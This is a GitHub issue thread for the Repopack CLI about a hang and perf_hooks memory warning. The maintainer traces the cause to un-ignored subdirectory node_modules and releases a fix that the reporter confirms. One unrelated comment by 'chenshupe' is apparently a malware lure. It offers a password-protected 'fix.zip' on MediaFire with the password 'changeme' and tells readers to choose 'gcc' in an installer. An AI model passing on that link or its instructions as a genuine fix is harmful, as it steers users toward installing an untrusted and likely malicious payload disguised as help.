### ISSUE TITLE
Infinite Loading and Memory Leak

### ISSUE THREAD

**Issue by RaYVen1337** [yamadashy/repopack#63]
---
### Summary
Since version 0.1.26 of **Repopack**, I have been randomly encountering the following error:

```
(node:19508) MaxPerformanceEntryBufferExceededWarning: Possible perf_hooks memory leak detected. 1000001 mark entries added to the global performance entry buffer. Use performance.clearMarks to clear the buffer.
```

When the error occurs, the process runs indefinitely without generating any content, and upon aborting with `CTRL + C`, only an empty Repopack file is created.

It is a small python project with under 1000 lines of code.

### Steps to Reproduce
1. Run Repopack with the following command:
   ```
   npx repopack
   ```
2. Wait for the packing process to complete.
3. Observe that the process runs without completing and without producing content.
4. When aborted with `CTRL + C`, an empty Repopack file is produced.

### What I Expected to Happen
Repopack should successfully complete the packaging process and generate the packed files.

### What Actually Happens
- The process hangs indefinitely.
- An empty Repopack file is generated when manually aborted.

### Additional Information
I ran the command with the suggested flag to trace warnings:

```bash
set NODE_OPTIONS=--trace-warnings && npx repopack
```

This is the output I received:

```
📦 Repopack v0.1.31

No custom config found at repopack.config.json or global config at C:\Users\rayven\AppData\Local\Repopack\repopack.config.json.
You can add a config file for additional settings. Please check https://github.com/yamadashy/repopack for more information.
⠸ Packing files...
(node:11652) MaxPerformanceEntryBufferExceededWarning: Possible perf_hooks memory leak detected. 1000001 mark entries added to the global performance entry buffer. Use performance.clearMarks to clear the buffer.
    at bufferUserTiming (node:internal/perf/observe:422:15)
    at mark (node:internal/perf/usertiming:160:3)
    at Performance.mark (node:internal/perf/performance:123:12)
    at SecretLintProfiler.mark (file:///C:/Users/rayven/AppData/Local/npm-cache/_npx/843b8f871cabf3ea/node_modules/@secretlint/profiler/module/index.js:41:23)
    at file:///C:/Users/rayven/AppData/Local/npm-cache/_npx/843b8f871cabf3ea/node_modules/@secretlint/core/module/RunningEvents.js:50:36
    at async Promise.all (index 8)
```

### System Information
- **Repopack Version**: v0.1.31 (started happening with v0.1.26)
- **Node.js Version**: v20.16.0
- **Operating System**: Windows 10.0.19045
- **NPM Version**: 10.8.2
- **Command Used**: `npx repopack`

---

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yamadashy** [comment]
I really appreciate the time and effort you've put into documenting this problem, including the additional information from running with the trace-warnings flag.

This seems to be a significant issue that needs careful investigation. Unfortunately, I won't be able to look into it today. I'll review this thoroughly tomorrow and try to reproduce the problem on my end.

Thank you again for bringing this to our attention.

**Comment by RaYVen1337** [comment]
Another addition, it seems to work just fine when adding a scope via a folder path.

e.g.
npx repopack backend/

**Comment by yamadashy** [comment]
I've identified the source of the memory leak. It appears to be occurring in the SecurityCheck function. When this function is disabled or set to return immediately, the packing process completes without any memory issues.

I will investigate the root cause in detail and work on implementing a fix for this issue.

**Comment by yamadashy** [comment]
I've come to realize that the issue might not be a memory leak, but rather an attempt to process an unexpectedly large number of files. Based on this insight, i've released a preliminary fix.

The application may appear to hang due to processing an unexpectedly large number of files. This could happen if many files are unintentionally not being ignored, leading to a CPU-intensive security check that blocks the event loop.

To address this, i've made the following improvements:

1. Optimized the security check process to reduce its impact on the event loop.
2. Improved the console output to provide more frequent updates during processing.

These changes should help prevent the appearance of hanging and give users a better understanding of the ongoing process.

I've released these changes in version [0.1.32](https://github.com/yamadashy/repopack/releases/tag/v0.1.32). I'd appreciate if you could try this new version and let us know if it resolves the issue or if you encounter any further problems.

Your feedback is valuable in helping us improve Repopack. Thank you again for bringing this to our attention!

**Comment by RaYVen1337** [comment]
Thanks, i love the new user feedback where one can see what is actually happening.
The problem really seems to have been the node_modules folder in my project. It scans all of that too.

I tried version 0.1.33 and its working now :D Even when the node_modules isn't excluded (which i will exclude manually in the future).
Could it be that it was originally ignored automatically, but some version reintroduced it in the scan?
Or that it only scans for it in the root of the project? 

My setup is like
/
/backend
/frontend

each with their own node_modules because of own package.json

**Comment by yamadashy** [comment]
@RaYVen1337 
Thank you for your detailed feedback and for providing more context!

To help us investigate further, could you provide some additional information? Specifically, I'd like to know where the `node_modules` directories are located in your project structure. 

```
/
/backend
/frontend
```

In version 0.1.19, I made some changes related to ignore pattern processing, migrating from `ignore` to `globby`. It's possible that this change might have unintentionally introduced a regression, particularly for Windows environments. I'm looking into this possibility.
https://github.com/yamadashy/repopack/releases/tag/v0.1.19

Thank you again for bringing this to our attention and for your patience as i work to resolve it!

**Comment by yamadashy** [comment]
It appears that subdirectory node_modules are not being ignored as expected. We are working on a fix for this issue.

**Comment by yamadashy** [comment]
Hi, @RaYVen1337 

I've just released version 0.1.34 which addresses the node_modules in subdirectories issue.
- https://github.com/yamadashy/repopack/releases/tag/v0.1.34

If you're interested and have time, we'd appreciate if you could test it out to see if it handles your project structure correctly without manual configuration! 🙏

**Comment by RaYVen1337** [comment]
Hi @yamadashy ,
I justed tested it and the folders aren't included anymore.
only the package-lock,json seems like something no one would need either, but there's always the ignore option :D
We can close this issue.

```
📈 Top 5 Files by Character Count and Token Count:
──────────────────────────────────────────────────────
1.  frontend/package-lock.json (148329 chars, 58884 tokens)
2.  backend/package-lock.json (66903 chars, 27454 tokens)
3.  backend/tsconfig.json (12266 chars, 2297 tokens)
4.  backend/controllers/character.controller.ts (4411 chars, 886 tokens)
5.  frontend/src/assets/react.svg (4126 chars, 2544 tokens)
```

**Comment by yamadashy** [comment]
Thank you so much for testing and providing this feedback!
I'm glad the `node_modules` issue is resolved. Your input has been incredibly helpful in improving Repopack.

Really appreciate your help in resolving this issue!
